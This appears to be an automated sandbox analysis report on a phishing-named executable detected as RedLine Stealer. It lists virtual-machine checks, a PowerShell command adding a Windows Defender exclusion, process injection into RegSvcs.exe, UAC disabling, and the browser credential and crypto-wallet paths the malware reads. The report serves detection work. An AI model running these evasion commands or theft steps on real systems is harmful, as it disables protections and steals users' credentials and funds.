Source: tmp7D68.tmp.11.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: tmp7D68.tmp.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: tmp7D68.tmp.11.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: tmp7D68.tmp.11.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.16.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: tmp7D68.tmp.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.16.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.16.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: tmp7D68.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.16.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.16.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: tmp7D68.tmp.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.16.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: tmp7D68.tmp.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: tmp7D68.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: tmp7D68.tmp.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.16.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: tmp7D68.tmp.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual USB Mouse
Source: tmp7D68.tmp.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.16.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.16.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: tmp7D68.tmp.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.16.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: tmp7D68.tmp.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: tmp7D68.tmp.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: tmp7D68.tmp.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.16.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegSvcs.exe, 0000000B.00000002.1535913064.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp7D68.tmp.11.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: tmp7D68.tmp.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.16.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: tmp7D68.tmp.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.16.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: tmp7D68.tmp.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: QUOTATION#09678.exe, 00000000.00000002.1694366617.000001D8D1BC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: tmp7D68.tmp.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 851008	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION#09678.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegSvcs.exe, 0000000B.00000002.1545465116.0000000007383000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION#09678.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7564, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CA579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDER85D1706D

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
